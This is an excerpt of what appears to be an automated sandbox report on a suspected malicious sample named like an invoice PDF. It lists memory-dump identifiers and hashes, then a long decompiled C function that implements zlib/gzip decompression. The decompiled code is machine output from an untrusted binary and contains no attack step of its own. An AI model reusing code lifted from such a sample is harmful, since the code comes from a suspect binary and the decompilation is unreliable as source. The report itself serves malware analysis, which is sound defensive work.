                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: HeapProcess
                            • String ID:
                            • API String ID: 54951025-0
                            • Opcode ID: d47de79c7a1478008edbade1156130f54a90bec2d8deee03812fe4eb34473742
                            • Instruction ID: 6a0b74d1a63a491a7d3ee290b25c822ea2796be564eee9ae90c6987516977aef
                            • Opcode Fuzzy Hash: d47de79c7a1478008edbade1156130f54a90bec2d8deee03812fe4eb34473742
                            • Instruction Fuzzy Hash: 4FA011B8A00200CBC3A08E3AA20A2083AECAA02B80F0080A8B008C000CEB308000AF00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 96%
                            			E013158C2(signed char* __ebx, unsigned int __edx, intOrPtr __edi, signed int __esi) {
                            				signed int _t782;
                            				signed int _t812;
                            				signed int _t814;
                            				signed int _t820;
                            				signed char* _t824;
                            				signed char* _t825;
                            				intOrPtr _t827;
                            				signed int _t832;
                            				signed int _t835;
                            				signed int _t953;
                            				signed char* _t954;
                            				intOrPtr _t956;
                            				signed char** _t982;
                            				signed char** _t989;
                            				signed int _t1101;
                            				unsigned int _t1103;
                            				signed int _t1104;
                            				signed int _t1105;
                            				intOrPtr _t1108;
                            				intOrPtr _t1109;
                            				intOrPtr _t1151;
                            				signed int _t1152;
                            				signed char** _t1153;
                            				signed int _t1179;
                            				unsigned int _t1181;
                            				signed int _t1185;
                            				intOrPtr _t1187;
                            				signed int _t1188;
                            				void* _t1192;
                            
                            				L0:
                            				while(1) {
                            					L0:
                            					_t1179 = __esi;
                            					_t1151 = __edi;
                            					_t1103 = __edx;
                            					_t954 = __ebx;
                            					if(__esi >= 0xe) {
                            						goto L184;
                            					} else {
                            						goto L181;
                            					}
                            					while(1) {
                            						L181:
                            						if(__ebp == 0) {
                            							break;
                            						}
                            						L182:
                            						__eax =  *__ebx & 0x000000ff;
                            						__eax = ( *__ebx & 0x000000ff) << __cl;
                            						__ebx = __ebx + 1;
                            						__edx = __edx + __eax;
                            						 *(__esp + 0x14) = __ebx;
                            						__esi = __esi + 8;
                            						 *(__esp + 0x10) = __edx;
                            						__ebp = __ebp - 1;
                            						if(__esi < 0xe) {
                            							continue;
                            						} else {
                            							L183:
                            							goto L184;
                            						}
                            						L362:
                            					}
                            					L102:
                            					_t1152 =  *(_t1192 + 0x10);
                            					L103:
                            					_t1108 =  *((intOrPtr*)(_t1192 + 0x4c));
                            					L104:
                            					_t989 =  *(_t1192 + 0x48);
                            					_t956 =  *((intOrPtr*)(_t1192 + 0x24));
                            					_t989[3] =  *(_t1192 + 0x20);
                            					_t989[4] =  *(_t1192 + 0x1c);
                            					_t989[1] = _t1185;
                            					_t1187 =  *((intOrPtr*)(_t1192 + 0x28));
                            					 *_t989 =  *(_t1192 + 0x14);
                            					 *(_t956 + 0x3c) = _t1152;
                            					 *(_t956 + 0x40) = _t1179;
                            					if( *(_t956 + 0x2c) != 0) {
                            						L109:
                            						_t812 = E01316930(_t989, _t989[3], _t1187 - _t989[4]);
                            						_t1192 = _t1192 + 0xc;
                            						if(_t812 == 0) {
                            							L346:
                            							_t989 =  *(_t1192 + 0x48);
                            							goto L347;
                            						} else {
                            							L110:
                            							 *((intOrPtr*)(_t956 + 4)) = 0x3f52;
                            							L111:
                            							return 0xfffffffc;
                            						}
                            					} else {
                            						L105:
                            						if(_t1187 == _t989[4]) {
                            							L347:
                            							_t814 =  *(_t1192 + 0x38) - _t989[1];
                            							_t1188 = _t1187 - _t989[4];
                            							_t989[2] =  &(_t989[2][_t814]);
                            							_t989[5] =  &(_t989[5][_t1188]);
                            							 *((intOrPtr*)(_t956 + 0x20)) =  *((intOrPtr*)(_t956 + 0x20)) + _t1188;
                            							 *(_t1192 + 0x38) = _t814;
                            							if(( *(_t956 + 0xc) & 0x00000004) == 0) {
                            								L352:
                            								_t1153 =  *(_t1192 + 0x48);
                            							} else {
                            								L348:
                            								if(_t1188 == 0) {
                            									goto L352;
                            								} else {
                            									L349:
                            									_push(_t1188);
                            									_push(_t989[3] - _t1188);
                            									_push( *(_t956 + 0x1c));
                            									if( *(_t956 + 0x14) == 0) {
                            										_t824 = L01316A20();
                            										_t1153 =  *(_t1192 + 0x54);
                            										_t1192 = _t1192 + 0xc;
                            										 *(_t956 + 0x1c) = _t824;
                            										_t1153[0xc] = _t824;
                            									} else {
                            										_t825 = E01316CA0();
                            										_t1153 =  *(_t1192 + 0x54);
                            										_t1192 = _t1192 + 0xc;
                            										 *(_t956 + 0x1c) = _t825;
                            										_t1153[0xc] = _t825;
                            									}
                            								}
                            							}
                            							L353:
                            							_t1109 =  *((intOrPtr*)(_t956 + 4));
                            							if(_t1109 == 0x3f47) {
                            								L356:
                            								_t1181 = 0x100;
                            							} else {
                            								L354:
                            								if(_t1109 == 0x3f42) {
                            									goto L356;
                            								} else {
                            									L355:
                            									_t1181 = 0;
                            								}
                            							}
                            							L357:
                            							 *(_t1192 + 0x48) = 0x80;
                            							asm("sbb ecx, ecx");
                            							_t816 =  ==  ?  *(_t1192 + 0x48) : 0;
                            							_t817 = ( ==  ?  *(_t1192 + 0x48) : 0) + ( ~( *(_t956 + 8)) & 0x00000040) + _t1181;
                            							_t818 = ( ==  ?  *(_t1192 + 0x48) : 0) + ( ~( *(_t956 + 8)) & 0x00000040) + _t1181 +  *(_t956 + 0x40);
                            							_t1153[0xb] = ( ==  ?  *(_t1192 + 0x48) : 0) + ( ~( *(_t956 + 8)) & 0x00000040) + _t1181 +  *(_t956 + 0x40);
                            							if( *(_t1192 + 0x38) != 0) {
                            								L359:
                            								if( *((intOrPtr*)(_t1192 + 0x4c)) != 4) {
                            									L361:
                            									return  *(_t1192 + 0x2c);
                            								} else {
                            									goto L360;
                            								}
                            							} else {
                            								L358:
                            								if(_t1188 == 0) {
                            									L360:
                            									_t820 =  *(_t1192 + 0x2c);
                            									_t821 =  ==  ? 0xfffffffb : _t820;
                            									return  ==  ? 0xfffffffb : _t820;
                            								} else {
                            									goto L359;
                            								}
                            							}
                            						} else {
                            							L106:
                            							_t827 =  *((intOrPtr*)(_t956 + 4));
                            							if(_t827 >= 0x3f51) {
                            								goto L347;
                            							} else {
                            								L107:
                            								if(_t827 < 0x3f4e) {
                            									goto L109;
                            								} else {
                            									L108:
                            									if(_t1108 == 4) {
                            										goto L347;
                            									} else {
                            										goto L109;
                            									}
                            								}
                            							}
                            						}
                            					}
                            					goto L362;
                            					L184:
                            					_t1179 = _t1179 - 0xe;
                            					_t1104 = _t1103 >> 5;
                            					 *((intOrPtr*)(_t1151 + 0x64)) = (_t1103 & 0x0000001f) + 0x101;
                            					_t1105 = _t1104 >> 5;
                            					 *((intOrPtr*)(_t1151 + 0x68)) = (_t1104 & 0x0000001f) + 1;
                            					_t1103 = _t1105 >> 4;
                            					 *(_t1192 + 0x10) = _t1103;
                            					 *((intOrPtr*)(_t1151 + 0x60)) = (_t1105 & 0x0000000f) + 4;
                            					if( *((intOrPtr*)(_t1151 + 0x64)) > 0x11e) {
                            						L198:
                            						_t982[6] = "too many length or distance symbols";
                            						 *(_t1151 + 4) = 0x3f51;
                            						goto L178;
                            					} else {
                            						L185:
                            						if( *((intOrPtr*)(_t1151 + 0x68)) > 0x1e) {
                            							goto L198;
                            						} else {
                            							L186:
                            							 *(_t1151 + 0x6c) = 0;
                            							 *(_t1151 + 4) = 0x3f45;
                            							L187:
                            							if( *(_t1151 + 0x6c) >=  *((intOrPtr*)(_t1151 + 0x60))) {
                            								L193:
                            								while( *(_t1151 + 0x6c) < 0x13) {
                            									L195:
                            									 *(_t1151 + 0x74 + ( *(0x13322b0 +  *(_t1151 + 0x6c) * 2) & 0x0000ffff) * 2) = 0;
                            									 *(_t1151 + 0x6c) =  *(_t1151 + 0x6c) + 1;
                            								}
                            								L196:
                            								_t832 = _t1151 + 0x534;
                            								 *(_t1151 + 0x58) = 7;
                            								 *(_t1151 + 0x50) = _t832;
                            								 *(_t1151 + 0x70) = _t832;
                            								_t835 = E01316F90(0, _t1151 + 0x74, 0x13, _t1151 + 0x70, _t1151 + 0x58, _t1151 + 0x2f4);
                            								_t1192 = _t1192 + 0x18;
                            								 *(_t1192 + 0x2c) = _t835;
                            								if(_t835 == 0) {
                            									L199:
                            									 *(_t1151 + 0x6c) = 0;
                            									 *(_t1151 + 4) = 0x3f46;
                            									goto L200;
                            								} else {
                            									L197:
                            									_t982 =  *(_t1192 + 0x48);
                            									_t1103 =  *(_t1192 + 0x10);
                            									_t982[6] = "invalid code lengths set";
                            									 *(_t1151 + 4) = 0x3f51;
                            									while(1) {
                            										L178:
                            										_t782 =  *(_t1151 + 4) - 0x3f34;
                            										if(_t782 > 0x1e) {
                            											break;
                            										}
                            										L1:
                            										switch( *((intOrPtr*)(_t782 * 4 +  &M01316560))) {
                            											case 0:
                            												L2:
                            												_t793 =  *(_t1151 + 0xc);
                            												if(_t793 != 0) {
                            													L4:
                            													__eflags = _t1179 - 0x10;
                            													if(_t1179 >= 0x10) {
                            														L9:
                            														__eflags = _t793 & 0x00000002;
                            														if((_t793 & 0x00000002) == 0) {
                            															L14:
                            															_t794 =  *(_t1151 + 0x24);
                            															 *(_t1151 + 0x14) = 0;
                            															__eflags = _t794;
                            															if(_t794 != 0) {
                            																 *(_t794 + 0x30) = 0xffffffff;
                            															}
                            															L16:
                            															__eflags =  *(_t1151 + 0xc) & 0x00000001;
                            															if(( *(_t1151 + 0xc) & 0x00000001) == 0) {
                            																L27:
                            																_t982[6] = "incorrect header check";
                            																 *(_t1151 + 4) = 0x3f51;
                            															} else {
                            																L17:
                            																_t797 = (_t1103 >> 8) + ((_t1103 & 0x000000ff) << 8);
                            																__eflags = _t797 % 0x1f;
                            																_t1103 =  *(_t1192 + 0x10);
                            																if(_t797 % 0x1f != 0) {
                            																	_t982 =  *(_t1192 + 0x48);
                            																	goto L27;
                            																} else {
                            																	L18:
                            																	__eflags = (_t1103 & 0x0000000f) - 8;
                            																	if((_t1103 & 0x0000000f) == 8) {
                            																		_t1103 = _t1103 >> 4;
                            																		_t1179 = _t1179 - 4;
                            																		 *(_t1192 + 0x10) = _t1103;
                            																		_t988 = (_t1103 & 0x0000000f) + 8;
                            																		__eflags =  *(_t1151 + 0x28);
                            																		if( *(_t1151 + 0x28) == 0) {
                            																			 *(_t1151 + 0x28) = _t988;
                            																		}
                            																		L22:
                            																		__eflags = _t988 - 0xf;
                            																		if(_t988 > 0xf) {
                            																			L25:
                            																			_t982 =  *(_t1192 + 0x48);
                            																			_t982[6] = "invalid window size";
                            																			 *(_t1151 + 4) = 0x3f51;
                            																		} else {
                            																			L23:
                            																			__eflags = _t988 -  *(_t1151 + 0x28);
                            																			if(_t988 >  *(_t1151 + 0x28)) {
                            																				goto L25;
                            																			} else {
                            																				_push(0);
                            																				_push(0);
                            																				_push(0);
                            																				 *(_t1151 + 0x18) = 1 << _t988;
                            																				_t803 = L01316A20();
                            																				_t1110 =  *(_t1192 + 0x1c);
                            																				_t1192 = _t1192 + 0xc;
                            																				_t982 =  *(_t1192 + 0x48);
                            																				 *(_t1151 + 0x1c) = _t803;
                            																				_t982[0xc] = _t803;
                            																				 *(_t1151 + 4) =  !(_t1110 >> 8) & 0x00000002 | 0x00003f3d;
                            																				_t1103 = 0;
                            																				 *(_t1192 + 0x10) = 0;
                            																				_t1179 = 0;
                            																			}
                            																		}
                            																	} else {
                            																		_t982 =  *(_t1192 + 0x48);
                            																		_t982[6] = "unknown compression method";
                            																		 *(_t1151 + 4) = 0x3f51;
                            																	}
                            																}
                            															}
                            														} else {
                            															L10:
                            															__eflags = _t1103 - 0x8b1f;
                            															if(_t1103 != 0x8b1f) {
                            																goto L14;
                            															} else {
                            																__eflags =  *(_t1151 + 0x28);
                            																if( *(_t1151 + 0x28) == 0) {
                            																	 *(_t1151 + 0x28) = 0xf;
                            																}
                            																_push(0);
                            																_push(0);
                            																_push(0);
                            																 *(_t1151 + 0x1c) = E01316CA0();
                            																_push(2);
                            																_push(_t1192 + 0x24);
                            																 *(_t1192 + 0x2c) = 0x8b1f;
                            																_push( *(_t1151 + 0x1c));
                            																_t806 = E01316CA0();
                            																_t1103 = 0;
                            																 *(_t1151 + 0x1c) = _t806;
                            																_t1192 = _t1192 + 0x18;
                            																 *(_t1192 + 0x10) = 0;
                            																_t1179 = 0;
                            																 *(_t1151 + 4) = 0x3f35;
                            																goto L177;
                            															}
                            														}
                            														goto L178;
                            													} else {
                            														while(1) {
                            															L6:
                            															__eflags = _t1185;
                            															if(_t1185 == 0) {
                            																goto L102;
                            															}
                            															L7:
                            															_t829 = ( *_t954 & 0x000000ff) << _t1179;
                            															_t954 =  &(_t954[1]);
                            															_t1103 = _t1103 + _t829;
                            															 *(_t1192 + 0x14) = _t954;
                            															_t1179 = _t1179 + 8;
                            															 *(_t1192 + 0x10) = _t1103;
                            															_t1185 = _t1185 - 1;
                            															__eflags = _t1179 - 0x10;
                            															if(_t1179 < 0x10) {
                            																continue;
                            															} else {
                            																_t793 =  *(_t1151 + 0xc);
                            																_t982 =  *(_t1192 + 0x48);
                            																goto L9;
                            															}
                            															goto L362;
                            														}
                            														goto L102;
                            													}
                            												} else {
                            													 *(_t1151 + 4) = 0x3f40;
                            													goto L178;
                            												}
                            												goto L362;
                            											case 1:
                            												L28:
                            												__eflags = __esi - 0x10;
                            												if(__esi >= 0x10) {
                            													L33:
                            													 *(__edi + 0x14) = __edx;
                            													__eflags = __dl - 8;
                            													if(__dl == 8) {
                            														L35:
                            														__eflags = __edx & 0x0000e000;
                            														if((__edx & 0x0000e000) == 0) {
                            															__ecx =  *(__edi + 0x24);
                            															__eflags = __ecx;
                            															if(__ecx != 0) {
                            																__edx = __edx >> 8;
                            																__eax = __edx >> 0x00000008 & 0x00000001;
                            																__eflags = __eax;
                            																 *__ecx = __eax;
                            															}
                            															L39:
                            															__eflags =  *(__edi + 0x14) & 0x00000200;
                            															if(( *(__edi + 0x14) & 0x00000200) != 0) {
                            																__eflags =  *(__edi + 0xc) & 0x00000004;
                            																if(( *(__edi + 0xc) & 0x00000004) != 0) {
                            																	 *(__esp + 0x18) = __dl;
                            																	__eax = __esp + 0x18;
                            																	_push(2);
                            																	__eflags = __edx;
                            																	_push(__eax);
                            																	 *(__esp + 0x21) = __dl;
                            																	_push( *(__edi + 0x1c));
                            																	__eax = E01316CA0();
                            																	__esp = __esp + 0xc;
                            																	 *(__edi + 0x1c) = __eax;
                            																}
                            															}
                            															__edx = 0;
                            															 *(__edi + 4) = 0x3f36;
                            															 *(__esp + 0x10) = 0;
                            															__esi = 0;
                            															goto L44;
                            														} else {
                            															 *(__ecx + 0x18) = "unknown header flags set";
                            															 *(__edi + 4) = 0x3f51;
                            															goto L178;
                            														}
                            													} else {
                            														 *(__ecx + 0x18) = "unknown compression method";
                            														 *(__edi + 4) = 0x3f51;
                            														goto L178;
                            													}
                            												} else {
                            													while(1) {
                            														L30:
                            														__eflags = __ebp;
                            														if(__ebp == 0) {
                            															goto L102;
                            														}
                            														L31:
                            														__eax =  *__ebx & 0x000000ff;
                            														__ecx = __esi;
                            														__eax = ( *__ebx & 0x000000ff) << __cl;
                            														__ebx = __ebx + 1;
                            														__edx = __edx + __eax;
                            														 *(__esp + 0x14) = __ebx;
                            														__esi = __esi + 8;
                            														 *(__esp + 0x10) = __edx;
                            														__ebp = __ebp - 1;
                            														__eflags = __esi - 0x10;
                            														if(__esi < 0x10) {
                            															continue;
                            														} else {
                            															__ecx =  *(__esp + 0x48);
                            															goto L33;
                            														}
                            														goto L362;
                            													}
                            													goto L102;
                            												}
                            												goto L362;
                            											case 2:
                            												L43:
                            												__eflags = __esi - 0x20;
                            												if(__esi >= 0x20) {
                            													L46:
                            													__eax =  *(__edi + 0x24);
                            													__eflags = __eax;
                            													if(__eax != 0) {
                            														 *(__eax + 4) = __edx;
                            													}
                            													__eflags =  *(__edi + 0x14) & 0x00000200;
                            													if(( *(__edi + 0x14) & 0x00000200) != 0) {
                            														__eflags =  *(__edi + 0xc) & 0x00000004;
                            														if(( *(__edi + 0xc) & 0x00000004) != 0) {
                            															__eax = __edx;
                            															 *(__esp + 0x18) = __dl;
                            															__eax = __edx >> 8;
                            															 *(__esp + 0x19) = __al;
                            															__edx = __edx >> 0x10;
                            															 *(__esp + 0x1a) = __al;
                            															__eax = __esp + 0x18;
                            															_push(4);
                            															__eflags = __edx;
                            															_push(__eax);
                            															 *(__esp + 0x23) = __dl;
                            															_push( *(__edi + 0x1c));
                            															__eax = E01316CA0();
                            															__esp = __esp + 0xc;
                            															 *(__edi + 0x1c) = __eax;
                            														}
                            													}
                            													__edx = 0;
                            													 *(__edi + 4) = 0x3f37;
                            													 *(__esp + 0x10) = 0;
                            													__esi = 0;
                            													goto L53;
                            												} else {
                            													while(1) {
                            														L44:
                            														__eflags = __ebp;
                            														if(__ebp == 0) {
                            															goto L102;
                            														}
                            														L45:
                            														__eax =  *__ebx & 0x000000ff;
                            														__ecx = __esi;
                            														__eax = ( *__ebx & 0x000000ff) << __cl;
                            														__ebx = __ebx + 1;
                            														__edx = __edx + __eax;
                            														 *(__esp + 0x14) = __ebx;
                            														__esi = __esi + 8;
                            														 *(__esp + 0x10) = __edx;
                            														__ebp = __ebp - 1;
                            														__eflags = __esi - 0x20;
                            														if(__esi < 0x20) {
                            															continue;
                            														} else {
                            															goto L46;
                            														}
                            														goto L362;
                            													}
                            													goto L102;
                            												}
                            												goto L362;
                            											case 3:
                            												L52:
                            												__eflags = __esi - 0x10;
                            												if(__esi >= 0x10) {
                            													L55:
                            													__ecx =  *(__edi + 0x24);
                            													__eflags = __ecx;
                            													if(__ecx != 0) {
                            														__eax = __dl & 0x000000ff;
                            														 *(__ecx + 8) = __dl & 0x000000ff;
                            														__ecx = __edx;
                            														__eax =  *(__edi + 0x24);
                            														__ecx = __edx >> 8;
                            														__eflags = __ecx;
                            														 *( *(__edi + 0x24) + 0xc) = __ecx;
                            													}
                            													__eflags =  *(__edi + 0x14) & 0x00000200;
                            													if(( *(__edi + 0x14) & 0x00000200) != 0) {
                            														__eflags =  *(__edi + 0xc) & 0x00000004;
                            														if(( *(__edi + 0xc) & 0x00000004) != 0) {
                            															 *(__esp + 0x18) = __dl;
                            															__eax = __esp + 0x18;
                            															_push(2);
                            															__eflags = __edx;
                            															_push(__eax);
                            															 *(__esp + 0x21) = __dl;
                            															_push( *(__edi + 0x1c));
                            															__eax = E01316CA0();
                            															__esp = __esp + 0xc;
                            															 *(__edi + 0x1c) = __eax;
                            														}
                            													}
                            													__edx = 0;
                            													 *(__edi + 4) = 0x3f38;
                            													 *(__esp + 0x10) = 0;
                            													__esi = 0;
                            													__eflags = 0;
                            													goto L61;
                            												} else {
                            													while(1) {
                            														L53:
                            														__eflags = __ebp;
                            														if(__ebp == 0) {
                            															goto L102;
                            														}
                            														L54:
                            														__eax =  *__ebx & 0x000000ff;
                            														__ecx = __esi;
                            														__eax = ( *__ebx & 0x000000ff) << __cl;
                            														__ebx = __ebx + 1;
                            														__edx = __edx + __eax;
                            														 *(__esp + 0x14) = __ebx;
                            														__esi = __esi + 8;
                            														 *(__esp + 0x10) = __edx;
                            														__ebp = __ebp - 1;
                            														__eflags = __esi - 0x10;
                            														if(__esi < 0x10) {
                            															continue;
                            														} else {
                            															goto L55;
                            														}
                            														goto L362;
                            													}
                            													goto L102;
                            												}
                            												goto L362;
                            											case 4:
                            												L61:
                            												__eflags =  *(__edi + 0x14) & 0x00000400;
                            												if(( *(__edi + 0x14) & 0x00000400) == 0) {
                            													L72:
                            													__eax =  *(__edi + 0x24);
                            													__eflags = __eax;
                            													if(__eax != 0) {
                            														 *(__eax + 0x10) = 0;
                            													}
                            													goto L74;
                            												} else {
                            													L62:
                            													__eflags = __esi - 0x10;
                            													if(__esi >= 0x10) {
                            														L66:
                            														__eax =  *(__edi + 0x24);
                            														 *(__edi + 0x44) = __edx;
                            														__eflags = __eax;
                            														if(__eax != 0) {
                            															 *(__eax + 0x14) = __edx;
                            														}
                            														__eflags =  *(__edi + 0x14) & 0x00000200;
                            														if(( *(__edi + 0x14) & 0x00000200) != 0) {
                            															__eflags =  *(__edi + 0xc) & 0x00000004;
                            															if(( *(__edi + 0xc) & 0x00000004) != 0) {
                            																 *(__esp + 0x18) = __dl;
                            																__eax = __esp + 0x18;
                            																_push(2);
                            																__eflags = __edx;
                            																_push(__eax);
                            																 *(__esp + 0x21) = __dl;
                            																_push( *(__edi + 0x1c));
                            																__eax = E01316CA0();
                            																__esp = __esp + 0xc;
                            																 *(__edi + 0x1c) = __eax;
                            															}
                            														}
                            														__ecx = 0;
                            														__esi = 0;
                            														 *(__esp + 0x10) = 0;
                            														L74:
                            														 *(__edi + 4) = 0x3f39;
                            														goto L75;
                            													} else {
                            														L63:
                            														while(1) {
                            															L64:
                            															__eflags = __ebp;
                            															if(__ebp == 0) {
                            																goto L102;
                            															}
                            															L65:
                            															__eax =  *__ebx & 0x000000ff;
                            															__ecx = __esi;
                            															__eax = ( *__ebx & 0x000000ff) << __cl;
                            															__ebx = __ebx + 1;
                            															__edx = __edx + __eax;
                            															 *(__esp + 0x14) = __ebx;
                            															__esi = __esi + 8;
                            															 *(__esp + 0x10) = __edx;
                            															__ebp = __ebp - 1;
                            															__eflags = __esi - 0x10;
                            															if(__esi < 0x10) {
                            																continue;
                            															} else {
                            																goto L66;
                            															}
                            															goto L362;
                            														}
                            														goto L102;
                            													}
                            												}
                            												goto L362;
                            											case 5:
                            												L75:
                            												__eflags =  *(__edi + 0x14) & 0x00000400;
                            												if(( *(__edi + 0x14) & 0x00000400) == 0) {
                            													L88:
                            													 *(__edi + 0x44) = 0;
                            													 *(__edi + 4) = 0x3f3a;
                            													goto L89;
                            												} else {
                            													L76:
                            													__ecx =  *(__edi + 0x44);
                            													__eflags = __ecx - __ebp;
                            													__ecx = __ecx > __ebp ? __ebp : __ecx;
                            													 *(__esp + 0x30) = __ecx;
                            													__eflags = __ecx;
                            													if(__ecx != 0) {
                            														__edx =  *(__edi + 0x24);
                            														__eflags = __edx;
                            														if(__edx != 0) {
                            															__eax =  *(__edx + 0x10);
                            															 *(__esp + 0x14) = __eax;
                            															__eflags = __eax;
                            															if(__eax != 0) {
                            																__eax =  *(__edx + 0x14);
                            																__eax =  *(__edx + 0x14) -  *(__edi + 0x44);
                            																__edx =  *(__edx + 0x18);
                            																 *(__esp + 0x34) = __eax;
                            																__eflags = __eax - __edx;
                            																__eax =  *(__esp + 0x34);
                            																if(__eflags <= 0) {
                            																	__edx = __ecx;
                            																} else {
                            																	__edx = __edx - __eax;
                            																}
                            																__eflags = __eax;
                            																__eax = E013189A0(__eax, __ebx, __edx);
                            																__ecx =  *(__esp + 0x3c);
                            															}
                            														}
                            														__eflags =  *(__edi + 0x14) & 0x00000200;
                            														if(( *(__edi + 0x14) & 0x00000200) != 0) {
                            															__eflags =  *(__edi + 0xc) & 0x00000004;
                            															if(( *(__edi + 0xc) & 0x00000004) != 0) {
                            																_push(__ecx);
                            																_push(__ebx);
                            																_push( *(__edi + 0x1c));
                            																__eax = E01316CA0();
                            																__esp = __esp + 0xc;
                            																 *(__edi + 0x1c) = __eax;
                            															}
                            														}
                            														__eax =  *(__esp + 0x30);
                            														__ebx = __ebx + __eax;
                            														__ebp = __ebp - __eax;
                            														 *(__esp + 0x14) = __ebx;
                            														_t161 = __edi + 0x44;
                            														 *_t161 =  *(__edi + 0x44) - __eax;
                            														__eflags =  *_t161;
                            													}
                            													__eflags =  *(__edi + 0x44);
                            													if( *(__edi + 0x44) != 0) {
                            														goto L102;
                            													} else {
                            														goto L88;
                            													}
                            												}
                            												goto L362;
                            											case 6:
                            												L89:
                            												__eflags =  *(__edi + 0x14) & 0x00000800;
                            												if(( *(__edi + 0x14) & 0x00000800) == 0) {
                            													L112:
                            													__eax =  *(__edi + 0x24);
                            													__eflags = __eax;
                            													if(__eax != 0) {
                            														 *(__eax + 0x1c) = 0;
                            													}
                            													goto L114;
                            												} else {
                            													L90:
                            													__eflags = __ebp;
                            													if(__ebp == 0) {
                            														goto L102;
                            													} else {
                            														L91:
                            														__ecx = 0;
                            														__eflags = 0;
                            														while(1) {
                            															L92:
                            															__eax =  *(__ecx + __ebx) & 0x000000ff;
                            															__ecx = __ecx + 1;
                            															 *(__esp + 0x30) = __eax;
                            															__eax =  *(__edi + 0x24);
                            															__eflags = __eax;
                            															if(__eax != 0) {
                            																__edx =  *(__eax + 0x1c);
                            																__eflags =  *(__eax + 0x1c);
                            																if( *(__eax + 0x1c) != 0) {
                            																	__edx =  *(__edi + 0x44);
                            																	__eflags = __edx -  *((intOrPtr*)(__eax + 0x20));
                            																	if(__edx <  *((intOrPtr*)(__eax + 0x20))) {
                            																		__eax =  *(__eax + 0x1c);
                            																		__ebx =  *(__esp + 0x30);
                            																		 *(__eax + __edx) = __bl;
                            																		_t178 = __edi + 0x44;
                            																		 *_t178 =  *(__edi + 0x44) + 1;
                            																		__eflags =  *_t178;
                            																		__ebx =  *(__esp + 0x14);
                            																	}
                            																}
                            															}
                            															__eax =  *(__esp + 0x30);
                            															__eflags = __eax;
                            															if(__eax == 0) {
                            																break;
                            															}
                            															L97:
                            															__eflags = __ecx - __ebp;
                            															if(__ecx < __ebp) {
                            																continue;
                            															}
                            															break;
                            														}
                            														L98:
                            														__eflags =  *(__edi + 0x14) & 0x00000200;
                            														 *(__esp + 0x34) = __ecx;
                            														if(( *(__edi + 0x14) & 0x00000200) != 0) {
                            															__eflags =  *(__edi + 0xc) & 0x00000004;
                            															if(( *(__edi + 0xc) & 0x00000004) != 0) {
                            																_push(__ecx);
                            																_push(__ebx);
                            																_push( *(__edi + 0x1c));
                            																__eax = E01316CA0();
                            																__ecx =  *(__esp + 0x40);
                            																__esp = __esp + 0xc;
                            																 *(__edi + 0x1c) = __eax;
                            																__eax =  *(__esp + 0x30);
                            															}
                            														}
                            														__ebx = __ebx + __ecx;
                            														__ebp = __ebp - __ecx;
                            														 *(__esp + 0x14) = __ebx;
                            														__eflags = __eax;
                            														if(__eax == 0) {
                            															L114:
                            															 *(__edi + 0x44) = 0;
                            															 *(__edi + 4) = 0x3f3b;
                            															goto L115;
                            														} else {
                            															goto L102;
                            														}
                            													}
                            												}
                            												goto L362;
                            											case 7:
                            												L115:
                            												__eflags =  *(__edi + 0x14) & 0x00001000;
                            												if(( *(__edi + 0x14) & 0x00001000) == 0) {
                            													L129:
                            													__eax =  *(__edi + 0x24);
                            													__eflags = __eax;
                            													if(__eax != 0) {
                            														 *(__eax + 0x24) = 0;
                            													}
                            													goto L131;
                            												} else {
                            													L116:
                            													__eflags = __ebp;
                            													if(__ebp == 0) {
                            														goto L102;
                            													} else {
                            														L117:
                            														__ecx = 0;
                            														__eflags = 0;
                            														while(1) {
                            															L118:
                            															__eax =  *(__ecx + __ebx) & 0x000000ff;
                            															__ecx = __ecx + 1;
                            															 *(__esp + 0x30) = __eax;
                            															__eax =  *(__edi + 0x24);
                            															__eflags = __eax;
                            															if(__eax != 0) {
                            																__edx =  *(__eax + 0x24);
                            																__eflags =  *(__eax + 0x24);
                            																if( *(__eax + 0x24) != 0) {
                            																	__edx =  *(__edi + 0x44);
                            																	__eflags = __edx -  *((intOrPtr*)(__eax + 0x28));
                            																	if(__edx <  *((intOrPtr*)(__eax + 0x28))) {
                            																		__eax =  *(__eax + 0x24);
                            																		__ebx =  *(__esp + 0x30);
                            																		 *(__eax + __edx) = __bl;
                            																		_t229 = __edi + 0x44;
                            																		 *_t229 =  *(__edi + 0x44) + 1;
                            																		__eflags =  *_t229;
                            																		__ebx =  *(__esp + 0x14);
                            																	}
                            																}
                            															}
                            															__eax =  *(__esp + 0x30);
                            															__eflags = __eax;
                            															if(__eax == 0) {
                            																break;
                            															}
                            															L123:
                            															__eflags = __ecx - __ebp;
                            															if(__ecx < __ebp) {
                            																continue;
                            															}
                            															break;
                            														}
                            														L124:
                            														__eflags =  *(__edi + 0x14) & 0x00000200;
                            														 *(__esp + 0x34) = __ecx;
                            														if(( *(__edi + 0x14) & 0x00000200) != 0) {
                            															__eflags =  *(__edi + 0xc) & 0x00000004;
                            															if(( *(__edi + 0xc) & 0x00000004) != 0) {
                            																_push(__ecx);
                            																_push(__ebx);
                            																_push( *(__edi + 0x1c));
                            																__eax = E01316CA0();
                            																__ecx =  *(__esp + 0x40);
                            																__esp = __esp + 0xc;
                            																 *(__edi + 0x1c) = __eax;
                            																__eax =  *(__esp + 0x30);
                            															}
                            														}
                            														__ebx = __ebx + __ecx;
                            														__ebp = __ebp - __ecx;
                            														 *(__esp + 0x14) = __ebx;
                            														__eflags = __eax;
                            														if(__eax != 0) {
                            															goto L102;
                            														} else {
                            															L128:
                            															L131:
                            															__edx =  *(__esp + 0x10);
                            															 *(__edi + 4) = 0x3f3c;
                            															goto L132;
                            														}
                            													}
                            												}
                            												goto L362;
                            											case 8:
                            												L132:
                            												__eflags =  *(__edi + 0x14) & 0x00000200;
                            												if(( *(__edi + 0x14) & 0x00000200) == 0) {
                            													L140:
                            													__ecx =  *(__edi + 0x24);
                            													__eflags = __ecx;
                            													if(__ecx != 0) {
                            														 *(__edi + 0x14) =  *(__edi + 0x14) >> 9;
                            														__eax =  *(__edi + 0x14) >> 0x00000009 & 0x00000001;
                            														__eflags = __eax;
                            														 *(__ecx + 0x2c) = __eax;
                            														__eax =  *(__edi + 0x24);
